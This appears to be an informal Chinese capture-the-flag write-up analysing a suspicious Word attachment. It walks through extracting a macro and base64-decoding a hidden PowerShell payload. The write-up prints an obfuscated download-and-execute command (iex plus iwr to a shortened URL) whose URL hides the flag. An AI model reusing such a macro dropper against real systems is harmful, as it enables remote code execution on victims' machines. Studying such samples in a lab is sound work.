打开题目,看下题目的要求说了啥,翻译一下就是:财务团队收到了一封看起来很重要的电子邮件,其中包含附加的 Word 文档。你能看一下并确认它是否是恶意的吗?
下载下来文件,一打开,确实是word文档。
木马,不存在的,我tm直接打开,我就不信了。
好吧,打开确实是word,但是看不到其他内容了。
此时我想到,要不用binwalk看下?
binwalk UegentPayment.doc
也看不出什么东西,那么咱们直接找别人的教程吧(逃……)
在kali中用libreoffice打开,提示包含macro什么什么的,就是宏,不管,先打开。
接着我们选择tools,macros,edit Macros。
在里面搜啊搜,找啊找,发现了一段似乎是powershell的东西
捞出来
应该是加密了之类的,我们尝试用base64解密下看看
确实是powershell,放进powershell执行一下
“该脚本尝试向该站点调用 GET 请求,但似乎它不存在……”
所以现在要做的是创建一个名为 test 的变量,并将其分配为 PowerShell 脚本的加密部分,以便以可读的格式查看它。
pOwErshElL $(-jOiN(($PshOMe[4]),("$PsHoME")[+15],"x");)(iwr $($test=("{5}{25}{8}{7}{0}{14}{3}{21}{2}{22}{15}{16}{31}{28}{11}{26}{17}{23}{27}{29}{10}{1}{6}{24}{30}{18}{13}{19}{12}{9}{20}{4}"-f "B","U","4","B","%7D","ht","R_d","//ow.ly/HT","p:","T","0","_","N","M","%7","E","f","1T","u","e","5","k","R","h","0","t","w","_","l","Y","C","U")))
然后输出一下$test,发现了flag
write-output $test
解密一下